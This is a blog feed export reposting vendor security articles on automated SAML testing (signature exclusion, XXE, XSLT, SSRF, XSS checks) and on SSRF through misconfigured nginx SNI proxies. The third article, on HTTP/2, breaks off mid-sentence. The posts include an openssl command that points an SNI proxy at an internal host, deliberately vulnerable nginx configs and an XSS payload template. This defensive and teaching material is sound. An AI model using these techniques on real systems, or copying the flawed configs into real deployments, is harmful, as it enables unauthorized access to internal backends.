tag:blogger.com,1999:blog-80959561979477928222024-02-19T10:52:42.139-08:00GreenDog's blogAleksei Tiurinhttp://www.blogger.com/profile/12130898511014099572noreply@blogger.comBlogger18125tag:blogger.com,1999:blog-8095956197947792822.post-32666256773159546172023-01-25T14:47:00.001-08:002023-04-13T14:49:51.107-07:00Testing SAML security with DAST<p> <i>(It's a repost from <a href="https://www.invicti.com/blog/web-security/testing-saml-security-with-dast/">https://www.invicti.com/blog/web-security/testing-saml-security-with-dast/</a>) </i></p><p>Testing the security of your SAML-based single sign-on infrastructure is
a vital but also difficult and tedious task. This technical post
presents the basics of SAML security and shows how automated security
checks developed by Invicti are making it possible to scan for some of
the most common SAML security issues.</p><p>Single sign-on (SSO) is the foundation of secure access to modern web
application environments, allowing users to log in once and apply that
authentication to multiple other applications. One of the most common
ways to implement SSO is using SAML, or the Security Assertion Markup
Language – an open standard for communicating authentication and
authorization requests and responses between systems. Any weaknesses in
how your application handles SAML messages could compromise your web
application, so SAML security is a vital consideration.</p>
<p>In the past, checking SAML endpoint security was only possible
through painstaking manual testing – but that is changing. This post
presents an overview of SAML security testing, introduces new security
checks in <a href="https://www.acunetix.com/product/" rel="noreferrer" target="_blank">Invicti’s Acunetix Premium vulnerability scanner</a>, and shows how advances in <a href="https://www.invicti.com/learn/dynamic-application-security-testing-dast/" rel="noreferrer">dynamic application security testing (DAST)</a> are making it possible to partially automate SAML security testing.</p>
<h2 class="mainHdngs" data-id="mainHdng_0">A brief introduction to SAML and SSO</h2>
<p><a href="http://docs.oasis-open.org/security/saml/Post2.0/sstc-saml-tech-overview-2.0.html" rel="noreferrer" target="_blank">SAML is a complex format</a>
for exchanging security-related data in a variety of situations. In
practice, SSO is by far the most common use for SAML today, so let’s
start with an overview of a typical SAML message flow in an SSO
situation for a web application.</p>
<p>Three parties are involved in a SAML data exchange: a user agent
(such as your web browser), a service provider (SP), and an identity
provider (IdP). In everyday terms, the service provider is the
application you want to access and the identity provider is the system
that can authenticate you. Figure 1 below shows the SAML messages that
are exchanged to get you logged into the application through SSO.</p>
<div class="wp-block-image is-style-default">
<figure class="aligncenter size-full is-resized"><a href="https://cdn.invicti.com/app/uploads/2023/01/25120759/image-7.png"><img alt="Typical SAML message flow for SSO" class="wp-image-36199" src="https://cdn.invicti.com/app/uploads/2023/01/25120759/image-7.png" width="480" /></a><figcaption class="wp-element-caption"><em>Figure 1. Typical SAML message flow for SSO</em></figcaption></figure></div>
<p>To summarize, you start by requesting access to an application using
external authentication (for example, by clicking a button to log in
with Google). The application takes your request and redirects you to
the identity provider (such as Google) with a <code>SAMLRequest</code>
parameter for authentication. After you’ve logged in (or if you are
already logged in there), the identity provider returns a form with a <code>SAMLResponse</code>
parameter to confirm your identity, and your browser automatically
passes it on to the application. Assuming everything is valid and you
are authorized to access the application, your browser is granted
access.</p>
<p>The two most important types of SAML messages that we will work with for security testing are <code>SAMLRequest</code> and <code>SAMLResponse</code>.
The SAML response includes (among other elements) a signature in XML
Signature (XMLDSig) format, and that signature is obviously a critical
component for security (and for vulnerability testing). We will also be
talking about testing SAML consumer endpoints – in this context, these
are URLs within the service provider application that are used to
receive SAML messages.</p>
<h2 class="mainHdngs" data-id="mainHdng_1">Approaches to automating SAML security testing</h2>
<p>SAML is a very complex technology, so to test for SAML
vulnerabilities, we need to look at the various possible attack
surfaces, see what attacks and vulnerabilities are possible where, and
what testing methods we could apply.</p>
<p>Working from the ground up, we know SAML is an XML-based language
that relies on a multitude of related technologies, such as XSLT and
XMLDSig, each with its own large attack surface, so we can play with a
variety of XML-related attacks. Secondly, there could be vulnerabilities
related to SAML itself, namely its implementation and configuration.
And finally, there are logical vulnerabilities in how SAML and the data
it provides are used in a particular system. So to fully and
qualitatively test a particular SAML implementation across all these
areas requires a lot of manual pentesting by an experienced tester with
specialized skills and knowledge.</p>
<p>While some issues, such as logical vulnerabilities, will always
require manual testing, we have implemented vulnerability checks for
Acunetix Premium that provide the first step towards automated security
testing for some of the most common attacks on SAML, namely attacks
targeting the service provider. Depending on the vulnerability type,
some attacks are only possible after authentication, while others can be
tested anonymously. Let’s dive into the SAML security checks we have
added to Acunetix Premium.</p>
<h2 class="mainHdngs" data-id="mainHdng_2">Testing for misconfigurations related to the SAML signature</h2>
<p>One of the most important security elements of SAML is the XML
Signature of a message. Not surprisingly, a large number of attacks on
SAML specifically focus on the signature, notably many variants of XML
Signature wrapping. One of the new security checks in Acunetix tests
whether the application is vulnerable to two of the most common
signature-related weaknesses: missing signature verification and
signature exclusion.</p>
<h3 class="mainHdngs" data-id="mainHdng_3">Prerequisite: Authenticating the scanner to get a valid SAMLResponse message</h3>
<p>To properly test for signature-related vulnerabilities, we need to be
able to authenticate with the application. This is necessary because
it’s the only way to obtain a valid <code>SAMLResponse</code> message to manipulate, and this requirement applies to both manual pentesting and automated tests.</p>
<p>For scanning with Acunetix specifically, this means first adding a suitable sequence in the <a href="https://www.acunetix.com/blog/docs/how-to-use-acunetix-business-logic-recorder/" rel="noreferrer" target="_blank">Logic Sequence Recorder (LSR)</a>
that includes the SAML authentication process. As an Acunetix user, you
follow the usual LSR process: start the LSR recording, open the target
URL, log in to the target site, authenticate with your identity provider
when redirected, and then return to the target. Everything is as usual,
with no additional settings. Following the same principle, you can also
create an LSR authentication sequence initiated by the identity
provider (this approach supports both Redirect-POST binding and
POST-POST binding). In all cases, the scanner automatically detects if
SAML technology is used under the hood and only runs the check if the
target is in scope. That way, you don’t need to worry about attempting
to scan an identity provider or even (in more complex authentication
configurations) a third-party or out-of-scope service provider.</p>
<p>Assuming you’ve enabled the SAML signature check in the scan profile
and added the relevant LSR sequence, Acunetix will run that sequence
during the scan to perform all the necessary steps and receive all the
SAML-related requests. Once the sequence reaches step 6 in figure 1, the
scanner can obtain both a valid <code>SAMLResponse</code> message and
the target’s response to that message (step 7). Now we can start
checking for various signature verification vulnerabilities.</p>
<h3 class="mainHdngs" data-id="mainHdng_4">Testing for signature exclusion and missing signature verification</h3>
<p>One of the most common SAML vulnerabilities is missing signature verification, where the service provider receives a signed <code>SAMLResponse</code>
message but doesn’t check the signature at all. This common issue isn’t
caused by a problem with the implementation of a particular SAML
library but by misconfiguration – it’s not unusual to disable signature
verification when developers test the SAML implementation and then
forget to enable it at the end. At first glance, the application works
as normal, and it is hard to see the problem because the <code>SAMLResponse</code> message from the identity provider arrives correctly signed, is accepted, and everything looks fine.</p>
<p>To check for insecure behavior, our security check (SAML signature audit) modifies the <code>DigestValue</code> element (see figure 2), making the signature invalid. If the target responds in a similar way as for a valid <code>SAMLResponse</code>
message despite the changed signature, we can assume that the service
provider does not check the signature. In modern web applications, it is
difficult to directly compare responses due to their dynamic nature. To
confidently detect whether an application has accepted or rejected a <code>SAMLResponse</code> message, we use a complex content-type-dependent algorithm for response comparison, as well as some additional checks.</p>
<div class="wp-block-image is-style-default">
<figure class="aligncenter size-full is-resized"><a href="https://cdn.invicti.com/app/uploads/2023/01/25120843/image-8.png"><img alt="Components of a SAML response" class="wp-image-36200" src="https://cdn.invicti.com/app/uploads/2023/01/25120843/image-8.png" width="480" /></a><figcaption class="wp-element-caption"><em>Figure 2. Components of a SAML response</em></figcaption></figure></div>
<p>Another security check attempts to perform a closely related attack:
signature exclusion. If successful, this can reveal a similar SAML
misconfiguration as with missing signature verification or even signal a
vulnerability in the actual SAML library used by a service provider.
Instead of merely modifying an existing signature, this check completely
removes the <code>Signature</code> element (the full <code>Signature</code>
branch in figure 2). Once again, we then compare how the application
responds to the modified response versus a valid one and report a
vulnerability if the unsigned message is not rejected.</p>
<h2 class="mainHdngs" data-id="mainHdng_5">Testing SAML consumer endpoint security</h2>
<p>The second set of checks (SAML consumer service audit) performs
anonymous tests for various vulnerabilities in the Assertion Consumer
Service (ACS) endpoint of the service provider. We will look at the
specific tests in a moment, but because we are now doing anonymous
testing, we first need to find a way to find out what we are going to
test.</p>
<h3 class="mainHdngs" data-id="mainHdng_6">Prerequisite: Getting a SAMLRequest message to test anonymously</h3>
<p>One of the difficulties with SAML is that it is quite tricky to do
any black-box testing on it, even manual pentesting. As shown in figure
1, the flow is that the service provider redirects the user to the
identity provider, which then returns a message for the service
provider. The crucial point is that, in most cases, the identity
provider returns the user not to the same path from which the request
was sent (step 1) but to a different location on the service provider –
specifically, to the ACS endpoint. For example, the user might initially
access <em>/auth/login</em> in step 1 but then be sent to a location like <em>/saml/acs</em> in steps 5 and 6. So for security testing, we need to probe this second endpoint on the service provider, not the initial one.</p>
<p>The problem here is that we need to somehow discover the actual path
for testing the service provider ACS. Normally, we would get this path
in step 5 after authenticating with the identity provider – but we’re
testing anonymously, so we need to discover the endpoint without the
need to authenticate. Luckily, we can solve this issue by parsing the <code>SAMLRequest</code> value received from the service provider in step 2. This contains a SAML <code>AuthnRequest</code>
element (encoded in base64 and compressed using Deflate) where the
service provider introduces itself to the identity provider and says
what response (assertion) it wants to get and where this should be sent.
Here is a sample <code>SAMLRequest</code> document to show you how this works:</p>
<div class="code-toolbar"><pre class="wp-block-code is-style-code-highlighter line-numbers language-xml" tabindex="0"><code class="language-xml"><span class="token tag"><span class="token tag"><span class="token punctuation"><</span><span class="token namespace">samlp:</span>AuthnRequest</span>
<span class="token attr-name"><span class="token namespace">xmlns:</span>samlp</span><span class="token attr-value"><span class="token punctuation attr-equals">=</span><span class="token punctuation">"</span>urn:oasis:names:tc:SAML:2.0:protocol<span class="token punctuation">"</span></span>
<span class="token attr-name"><span class="token namespace">xmlns:</span>saml</span><span class="token attr-value"><span class="token punctuation attr-equals">=</span><span class="token punctuation">"</span>urn:oasis:names:tc:SAML:2.0:assertion<span class="token punctuation">"</span></span>
<span class="token attr-name">ID</span><span class="token attr-value"><span class="token punctuation attr-equals">=</span><span class="token punctuation">"</span>some_value<span class="token punctuation">"</span></span>
<span class="token attr-name">Version</span><span class="token attr-value"><span class="token punctuation attr-equals">=</span><span class="token punctuation">"</span>2.0<span class="token punctuation">"</span></span>
<span class="token attr-name">IssueInstant</span><span class="token attr-value"><span class="token punctuation attr-equals">=</span><span class="token punctuation">"</span>2023-01-12T11:44:12Z<span class="token punctuation">"</span></span>
<span class="token attr-name">Destination</span><span class="token attr-value"><span class="token punctuation attr-equals">=</span><span class="token punctuation">"</span>http://idp_name.com/saml/idp<span class="token punctuation">"</span></span>
<span class="token attr-name">ProtocolBinding</span><span class="token attr-value"><span class="token punctuation attr-equals">=</span><span class="token punctuation">"</span>urn:oasis:names:tc:SAML:2.0:bindings:HTTP-POST<span class="token punctuation">"</span></span>
<span class="token attr-name">AssertionConsumerServiceURL</span><span class="token attr-value"><span class="token punctuation attr-equals">=</span><span class="token punctuation">"</span>http://sp_name.com/acs<span class="token punctuation">"</span></span>
<span class="token punctuation">></span></span>
<span class="token tag"><span class="token tag"><span class="token punctuation"><</span><span class="token namespace">saml:</span>Issuer</span><span class="token punctuation">></span></span>sp_name<span class="token tag"><span class="token tag"><span class="token punctuation"></</span><span class="token namespace">saml:</span>Issuer</span><span class="token punctuation">></span></span>
<span class="token tag"><span class="token tag"><span class="token punctuation"><</span><span class="token namespace">samlp:</span>NameIDPolicy</span>
<span class="token attr-name">Format</span><span class="token attr-value"><span class="token punctuation attr-equals">=</span><span class="token punctuation">"</span>urn:oasis:names:tc:SAML:1.1:nameid-format:unspecified<span class="token punctuation">"</span></span>
<span class="token attr-name">AllowCreate</span><span class="token attr-value"><span class="token punctuation attr-equals">=</span><span class="token punctuation">"</span>true<span class="token punctuation">"</span></span> <span class="token punctuation">/></span></span>
<span class="token tag"><span class="token tag"><span class="token punctuation"><</span><span class="token namespace">samlp:</span>RequestedAuthnContext</span> <span class="token attr-name">Comparison</span><span class="token attr-value"><span class="token punctuation attr-equals">=</span><span class="token punctuation">"</span>exact<span class="token punctuation">"</span></span><span class="token punctuation">></span></span>
<span class="token tag"><span class="token tag"><span class="token punctuation"><</span><span class="token namespace">saml:</span>AuthnContextClassRef</span><span class="token punctuation">></span></span>urn:oasis:names:tc:SAML:2.0:ac:classes:PasswordProtectedTransport<span class="token tag"><span class="token tag"><span class="token punctuation"></</span><span class="token namespace">saml:</span>AuthnContextClassRef</span><span class="token punctuation">></span></span>
<span class="token tag"><span class="token tag"><span class="token punctuation"></</span><span class="token namespace">samlp:</span>RequestedAuthnContext</span><span class="token punctuation">></span></span>
<span class="token tag"><span class="token tag"><span class="token punctuation"></</span><span class="token namespace">samlp:</span>AuthnRequest</span><span class="token punctuation">></span></span></code></pre></div><div class="toolbar"><div class="toolbar-item"></div></div><p>Parsing the <code>AuthnRequest</code> value, the identity provider looks at the content of the <code>saml:Issuer</code> element to learn what service provider sent the request (<code>sp_name</code> in this example). We can also look at the optional (but commonly included) <code>AssertionConsumerServiceURL</code> attribute to discover the expected ACS path on the service provider – in this example, it is <code>http://sp_name.com/acs</code>.
The Acunetix scanner uses this information to trigger and run SAML
consumer endpoint security checks. Specifically, the checks are only run
if, during crawling, Acunetix encounters a <code>SAMLRequest</code> message (Redirect Binding) that contains an <code>AssertionConsumerServiceURL</code><em> </em>attribute.</p>
<p>The remaining <code>AuthnRequest</code> elements can also be very
useful for manual pentesting to help us understand exactly what elements
(attributes) the service provider expects to get in the assertion. The <code>Destination</code> attribute also tells us what identity provider is used, which helps to infer (especially for typical products) the location of <a href="https://en.wikipedia.org/wiki/SAML_metadata" rel="noreferrer" target="_blank">SAML metadata</a>, including the X.509 certificate and its <code>Issuer</code> value. So in some cases, we can collect enough data manually to create a correct <code>SAMLResponse</code>
message (without a valid signature, of course) for a given service
provider completely from scratch. This is useful for test attacks
related to signature checking, including signature exclusion and
certificate faking.</p>
<h3 class="mainHdngs" data-id="mainHdng_7">DAST security checks for SAML consumer endpoint vulnerabilities</h3>
<p>At this point, the scanner knows the ACS URL and is able to probe the
SAML consumer endpoint for vulnerabilities. The tests look for security
issues related to the SAML library implementation, so we’re working
with the steps preceding signature verification in the process. Let’s
see what vulnerabilities can be identified automatically by Acunetix.</p>
<h4>XXE injection vulnerabilities</h4>
<p>SAML is an XML-based language, so the service provider needs to parse
an XML document before it does anything else. Thus, we can test for <a href="https://www.invicti.com/learn/xml-external-entity-xxe/" rel="noreferrer">XXE injection vulnerabilities</a>
without even forging a valid fake SAML message (because parsing needs
to happen before any validation). Acunetix tests for XXE vulnerabilities
in SAML consumer endpoints – and before you say XXE is no longer a
threat, such vulnerabilities do still occur (see <a href="https://nvd.nist.gov/vuln/detail/CVE-2022-35741" rel="noreferrer" target="_blank">CVE-2022-35741</a> in Apache CloudStack SSO as an example).</p>
<h4>XSLT injection vulnerabilities</h4>
<p>After receiving a <code>SAMLResponse</code> message, the service
provider needs to run some transformations on the SAML document using
XSLT, exposing yet another attack surface. To check this, Acunetix
inserts a typical XSLT attack payload in the <code>Reference</code> element of the signature (see figure 2 for the signature structure). </p>
<h4>SSRF vulnerabilities</h4>
<p>The <code>KeyInfo</code> element is the part of an XML Signature
(XMLDSig) used to obtain the key needed to validate the signature. For
security testing, one very interesting feature of <code>KeyInfo</code>
is dereferencing – the ability to specify the key location as a path to a
local file or a remote URL. To any pentester, this immediately signals
opportunities for at least a blind SSRF attack. This insecure feature
has no place in any hardened SAML implementation, yet it may still be
present in some modern implementations. What’s more, in certain cases,
it is also possible to read local files using XSLT transformations.</p>
<p>Real-life vulnerabilities related to <code>KeyInfo</code> include <a href="https://nvd.nist.gov/vuln/detail/CVE-2021-40690" rel="noreferrer" target="_blank">CVE-2021-40690</a> in the widely-used Apache Santuario library and <a href="https://nvd.nist.gov/vuln/detail/CVE-2022-21497" rel="noreferrer" target="_blank">CVE-2022-21497</a>
in Oracle Access Manager (and some other Oracle products). If you are
interested in this topic, I recommend two blog posts about exploiting
these <a href="https://blog.tint0.com/2021/09/pinging-xmlsec.html" rel="noreferrer" target="_blank">Santuario</a> and <a href="https://peterjson.medium.com/miracle-one-vulnerability-to-rule-them-all-c3aed9edeea2" rel="noreferrer" target="_blank">OAM vulnerabilities</a>. Acunetix uses several payloads to test for both these CVEs and similar variations of support for this feature.</p>
<h4>XSS vulnerabilities</h4>
<p>Although it is encoded, the <code>SAMLResponse</code> parameter is
still user input and could potentially be abused to perform injection
attacks, so Acunetix also includes checks for <a href="https://www.invicti.com/learn/cross-site-scripting-xss/" rel="noreferrer">XSS vulnerabilities</a>. This allows us to detect vulnerabilities similar to <a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-3580" rel="noreferrer">CVE-2020-3580</a> in Cisco ASA, where the server response includes the <code>SAMLResponse</code> value.</p>
<p>Interestingly, many SAML libraries check the values of some <code>SAMLResponse</code> attributes before validating the signature. For example, they check the value of the <code>saml:Issuer</code> element that indicates which identity provider sent the given response (similar to the same element in <code>AuthnRequest</code>).
If the target then returns this value in error messages without proper
encoding, an XSS vulnerability may result, so we need to test for it.
(As a side note, the scanner doesn’t know the correct <code>saml:Issuer</code> value for the identity provider, but it can still run the security check using the <code>Destination</code> value from <code>AuthnRequest</code>, as that works for some common identity providers).</p>
<p>An important point is that we’re working with XML, so whenever you’re
injecting XSS payloads into SAML attributes, you need to correctly
encode them using entity references to avoid problems with XML parsing
and schema validation for the <code>SAMLResponse</code> message. For the <code>Destination</code> attribute, which should point to the ACS URL, an XSS payload also needs to be a valid URL, for example:</p>
<div class="code-toolbar"><pre class="wp-block-code is-style-code-highlighter line-numbers language-javascript" tabindex="0"><code class="language-javascript">Destination<span class="token operator">=</span><span class="token string">"http://sp_target/path?&lt;xss_payload&gt;"</span></code></pre></div><div class="toolbar"><div class="toolbar-item"></div></div><h2 class="mainHdngs" data-id="mainHdng_8">One small step for automating SAML security testing</h2>
<p>Testing the security of SAML data processing and signature
verification is crucial if you want to be sure that your single sign-on
infrastructure is secure. Considering the complexity of manual testing,
automating the process is a convenient way to perform systematic SAML
security testing. The current Acunetix Premium release adds new security
checks to help you automatically find the most common vulnerabilities
related to SAML processing and signature verification. While this is
already a significant step towards improving SAML security, it is only
the first step for us at Invicti, as we are already working on adding
more SAML checks for our products. We are also looking forward to
getting user feedback on the checks added with the current release.</p><p></p>Aleksei Tiurinhttp://www.blogger.com/profile/12130898511014099572noreply@blogger.com0tag:blogger.com,1999:blog-8095956197947792822.post-6745695654744209222022-12-29T14:43:00.002-08:002023-04-13T14:50:04.309-07:00SSRF vulnerabilities caused by SNI proxy misconfigurations<p> <i>(It's a repost from https://www.invicti.com/blog/web-security/ssrf-vulnerabilities-caused-by-sni-proxy-misconfigurations/)</i></p><p>SNI proxies are load balancers that use the SNI extension field to
select backend systems. When misconfigured, SNI proxies can be
vulnerable to SSRF attacks that provide access to web application
backends.</p><p>A typical task in complex web applications is routing requests to
different backend servers to perform load balancing. Most often, a
reverse proxy is used for this. Such reverse proxies work at the
application level (over HTTP), and requests are routed based on the
value of the <code>Host</code> header (<code>:authority</code> for HTTP/2) or parts of the path.</p>
<p>One typical misconfiguration is when the reverse proxy directly uses this information as the backend address. This can lead to <a href="http://invicti.com/learn/server-side-request-forgery-ssrf/" rel="noreferrer">server-side request forgery (SSRF)</a>
vulnerabilities that allow attackers to access servers behind the
reverse proxy and, for example, steal information from AWS metadata. I
decided to investigate similar attacks on proxy setups operating at
other levels/protocols – in particular, SNI proxies.</p>
<h2 class="mainHdngs" data-id="mainHdng_0">What is TLS SNI?</h2>
<p>Server Name Indication (SNI) is an extension of the TLS protocol that
provides the foundation of HTTPS. When a browser wants to establish a
secure connection to a server, it initiates a TLS handshake by sending a
<code>ClientHello</code> message. This message may contain an SNI extension field that includes the server domain name. In its <code>ServerHello</code>
message, the server can then return a certificate appropriate for the
specified server name. The typical use case for this is when there are
multiple virtual hosts behind one IP address.</p>
<h2 class="mainHdngs" data-id="mainHdng_1">What is an SNI proxy?</h2>
<p>When a reverse proxy (more correctly, a load balancer) uses a value
from the SNI field to select a specific backend server, we have an SNI
proxy. With the widespread use of TLS and HTTPS in particular, this
approach is becoming more popular. (Note that another meaning of SNI
proxy refers to the use of such proxies to bypass censorship in some
countries.)</p>
<p>There are two main options for running an SNI proxy: with or without
SSL termination. In both cases, the SNI proxy uses the SNI field value
to select an appropriate backend. When running with SSL termination, the
TLS connection is established with the SNI proxy, and then the proxy
forwards the decrypted traffic to the backend. In the second case, the
SNI proxy forwards the entire data stream, really working more like a
TCP proxy.</p>
<h2 class="mainHdngs" data-id="mainHdng_2">A typical SNI proxy configuration</h2>
<p>Many reverse proxies/load balancers support SNI proxy configurations,
including Nginx, Haproxy, Envoy, ATS, and others. It seems you can even
use an <a href="https://gist.github.com/kekru/c09dbab5e78bf76402966b13fa72b9d2#choose-upstream-based-on-domain-pattern" rel="noreferrer" target="_blank">SNI proxy in Kubernetes</a>.</p>
<p>To give an example for Nginx, the simplest configuration would look as follows (note that this requires the Nginx modules <code>ngx_stream_core_module</code> and <code>ngx_stream_ssl_preread_module</code> to work):</p>
<div class="code-toolbar"><pre class="wp-block-code is-style-code-highlighter line-numbers language-nginx" tabindex="0"><code class="language-nginx"><span class="token directive"><span class="token keyword">stream</span></span> <span class="token punctuation">{</span>
<span class="token directive"><span class="token keyword">map</span> <span class="token variable">$ssl_preread_server_name</span> <span class="token variable">$targetBackend</span></span> <span class="token punctuation">{</span>
<span class="token directive"><span class="token keyword">test1.example.com</span> backend1:443</span><span class="token punctuation">;</span>
<span class="token directive"><span class="token keyword">test2.example.com</span> backend2:9999</span><span class="token punctuation">;</span>
<span class="token punctuation">}</span>
<span class="token directive"><span class="token keyword">server</span></span> <span class="token punctuation">{</span>
<span class="token directive"><span class="token keyword">listen</span> <span class="token number">443</span></span><span class="token punctuation">;</span>
<span class="token directive"><span class="token keyword">resolver</span> 127.0.0.11</span><span class="token punctuation">;</span>
<span class="token directive"><span class="token keyword">proxy_pass</span> <span class="token variable">$targetBackend</span>:443</span><span class="token punctuation">;</span>
<span class="token directive"><span class="token keyword">ssl_preread</span> <span class="token boolean">on</span></span><span class="token punctuation">;</span>
<span class="token punctuation">}</span>
<span class="token punctuation">}</span></code></pre></div><div class="toolbar"><div class="toolbar-item"></div></div><p>Here, we configure a server (TCP proxy) called <code>stream</code> and enable SNI access using <code>ssl_preread on</code>. Depending on the SNI field value (in <code>$ssl_preread_server_name</code>), Nginx will route the whole TLS connection either to <code>backend1</code> or <code>backend2</code>.</p>
<h2 class="mainHdngs" data-id="mainHdng_3">SNI proxy misconfigurations leading to SSRF</h2>
<p>The simplest misconfiguration that would allow you to connect to an arbitrary backend would look something like this:</p>
<div class="code-toolbar"><pre class="wp-block-code is-style-code-highlighter line-numbers language-nginx" tabindex="0"><code class="language-nginx"><span class="token directive"><span class="token keyword">stream</span></span> <span class="token punctuation">{</span>
<span class="token directive"><span class="token keyword">server</span></span> <span class="token punctuation">{</span>
<span class="token directive"><span class="token keyword">listen</span> <span class="token number">443</span></span><span class="token punctuation">;</span>
<span class="token directive"><span class="token keyword">resolver</span> 127.0.0.11</span><span class="token punctuation">;</span>
<span class="token directive"><span class="token keyword">proxy_pass</span> <span class="token variable">$ssl_preread_server_name:443</span></span><span class="token punctuation">;</span>
<span class="token directive"><span class="token keyword">ssl_preread</span> <span class="token boolean">on</span></span><span class="token punctuation">;</span>
<span class="token punctuation">}</span>
<span class="token punctuation">}</span></code></pre></div><div class="toolbar"><div class="toolbar-item"></div></div><p>Here, the SNI field value is used directly as the address of the backend.</p>
<p>With this insecure configuration, we can exploit the SSRF
vulnerability simply by specifying the desired IP or domain name in the
SNI field. For example, the following command would force Nginx to
connect to <i>internal.host.com</i>:</p>
<pre class="wp-block-code"><code>openssl s_client -connect<a href="http://lab.io:10003/" rel="noreferrer"> </a>target.com:443 -servername "internal.host.com" -crlf</code></pre>
<p>In general, according to <a href="https://www.rfc-editor.org/rfc/rfc6066#page-6" rel="noreferrer" target="_blank">RFC 6066</a>, IP addresses should <i>not</i>
be used in SNI values, but in practice, we can still use them. What’s
more, we can even send arbitrary symbols in this field, including null
bytes, which can be useful for exploitation. As you can see below, the
server name can be changed to an arbitrary string. Though for this
specific Nginx configuration, unfortunately, I did not find a way to
change the backend port:</p>
<div class="wp-block-image is-style-default">
<figure class="aligncenter size-large is-resized"><a href="https://cdn.invicti.com/app/uploads/2022/12/29154609/image-23-1024x159.png"><img alt="" class="wp-image-34852" src="https://cdn.invicti.com/app/uploads/2022/12/29154609/image-23-1024x159.png" width="800" /></a></figure></div>
<p>Another class of vulnerable configurations is similar to typical HTTP
reverse proxy misconfigurations and involves mistakes in the regular
expression (regex). In this example, traffic is forwarded to the backend
if the name provided via SNI matches the regex:</p>
<div class="code-toolbar"><pre class="wp-block-code is-style-code-highlighter line-numbers language-nginx" tabindex="0"><code class="language-nginx"><span class="token directive"><span class="token keyword">stream</span></span> <span class="token punctuation">{</span>
<span class="token directive"><span class="token keyword">map</span> <span class="token variable">$ssl_preread_server_name</span> <span class="token variable">$targetBackend</span></span> <span class="token punctuation">{</span>
~^www.example\.com $ssl_preread_server_name<span class="token punctuation">;</span>
<span class="token punctuation">}</span>
<span class="token directive"><span class="token keyword">server</span></span> <span class="token punctuation">{</span>
<span class="token directive"><span class="token keyword">listen</span> <span class="token number">443</span></span><span class="token punctuation">;</span>
<span class="token directive"><span class="token keyword">resolver</span> 127.0.0.11</span><span class="token punctuation">;</span>
<span class="token directive"><span class="token keyword">proxy_pass</span> <span class="token variable">$targetBackend</span>:443</span><span class="token punctuation">;</span>
<span class="token directive"><span class="token keyword">ssl_preread</span> <span class="token boolean">on</span></span><span class="token punctuation">;</span>
<span class="token punctuation">}</span>
<span class="token punctuation">}</span></code></pre></div><div class="toolbar"><div class="toolbar-item"></div></div><p>This regex is incorrect because the first period character in <code>www.example.com</code> is not escaped, and the expression is missing the <code>$</code> terminator at the end. The resulting regex matches not only <i>www.example.com</i> but also URLs like <i>www.example.com.attacker.com </i>or <i>wwwAexample.com</i>.
As a result, we can perform SSRF and connect to an arbitrary backend.
While we can’t use the IP address directly here, we can bypass this
restriction simply by telling our DNS server that <i>www.example.com.attacker.com</i> should resolve to 127.0.0.1.</p>
<h2 class="mainHdngs" data-id="mainHdng_4">Potential directions for SNI proxy research and abuse</h2>
<p>In a 2016 <a href="https://www.bamsoftware.com/computers/sniproxy/" rel="noreferrer" target="_blank">article about scanning IPv4 for open SNI proxies</a>,
researchers managed to find about 2500 servers with a fairly basic
testing approach. While this number may seem low, SNI proxy
configurations have become more popular since 2016 and are widely
supported, as evidenced even by a quick search of GitHub. </p>
<p>As a direction for further research, I can suggest a couple of things
to think about for configurations without TLS termination. An SNI proxy
checks only the first <code>ClientHello</code> message and then proxies
all the subsequent traffic, even if it’s not correct TLS messages.
Also, while the RFC specifies that you can only have one SNI field, in
practice, we can send multiple different names (<a href="https://github.com/tls-attacker/TLS-Attacker" rel="noreferrer" target="_blank">TLS-Attacker</a>
is a handy tool here). Because Nginx only checks the first value, there
could (theoretically) be an avenue to gain some additional access if a
backend accepts such a <code>ClientHello</code> message but then uses the second SNI value.</p>
<h2 class="mainHdngs" data-id="mainHdng_5">Avoiding SNI proxy vulnerabilities</h2>
<p>Whenever you configure a reverse proxy, you should be aware that any
misconfigurations may potentially lead to SSRF vulnerabilities that
expose backend systems to attack. The same applies to SNI proxies,
especially as they are gaining popularity in large-scale production
systems. In general, to avoid vulnerabilities when configuring a reverse
proxy, you should understand what data could be controlled by an
attacker and avoid using it directly in an insecure way.</p><p> </p>Aleksei Tiurinhttp://www.blogger.com/profile/12130898511014099572noreply@blogger.com0tag:blogger.com,1999:blog-8095956197947792822.post-66064388755364813592021-12-09T02:35:00.004-08:002022-08-23T02:38:31.848-07:00How Acunetix addresses HTTP/2 vulnerabilities<p> <i>(It's a repost from <a href="https://www.acunetix.com/blog/web-security-zone/how-acunetix-addresses-http-2-vulnerabilities/">https://www.acunetix.com/blog/web-security-zone/how-acunetix-addresses-http-2-vulnerabilities/</a>) </i></p><p>In the <a href="https://www.acunetix.com/blog/releases/acunetix-introduces-support-for-the-detection-of-http-2-vulnerabilities-and-improves-handling-of-laravel-csrf-tokens/">latest release of Acunetix</a>,
we added support for the HTTP/2 protocol and introduced several checks
specific to the vulnerabilities associated with this protocol. For
example, we introduced checks for misrouting, server-side request forgery (SSRF), and web cache poisoning. In this article, we’d like to explain how these vulnerabilities happen so that you can understand the logic behind the checks.</p><p></p><h2>An introduction to HTTP/2</h2>
<p>To understand HTTP/2, it’s best to compare it with its predecessor, HTTP/1.x.</p>
<h3>How HTTP/1.x works</h3>
<p>HTTP/1.x is a text-based protocol. An HTTP request consists of
headers and possibly a body. To separate headers between themselves as
well as headers from the body, you use the character sequence <code>\r\n</code> (CRLF).</p>
<p>The first header is the <em>request line</em>, which consists of a
method, a path, and a protocol version. To separate these elements, you
usually use whitespaces. Other headers are name and value pairs
separated by a colon (:). The only header that is required is <em>Host</em>.</p>
<p>The path may be represented in different ways. Usually, it is relative and it begins with a slash such as <em>/path/here</em>, but it may also be an absolute URI such as <em>http://virtualhost2.com/path/here</em>. Moreover, the hostname from the path takes precedence over the value of the <em>Host</em> header.</p>
<pre><code class=" hljs http"><span class="hljs-request">GET <span class="hljs-string">/path/here</span> HTTP/1.1</span>
<span class="hljs-attribute">Host</span>: <span class="hljs-string">virtualhost.com</span>
<span class="hljs-attribute">Other-header</span>: <span class="hljs-string">value</span>
</code></pre>
<p>When the web server receives an HTTP/1.x request, it parses it using
certain characters as separators. However, due to the fact that HTTP is
an old protocol and there are many different RFCs dedicated to it,
different web servers parse requests differently and have different
restrictions regarding the values of certain elements.</p>
<h3>How HTTP/2 works</h3>
<p>HTTP/2, on the other hand, is a binary protocol with a completely
different internal organization. To understand its vulnerabilities, you
must know how the main elements of the HTTP/1.x protocol are now
represented.</p>
<p>HTTP/2 got rid of the request line and now all the data is presented
in the form of headers. Moreover, since the protocol is binary, each
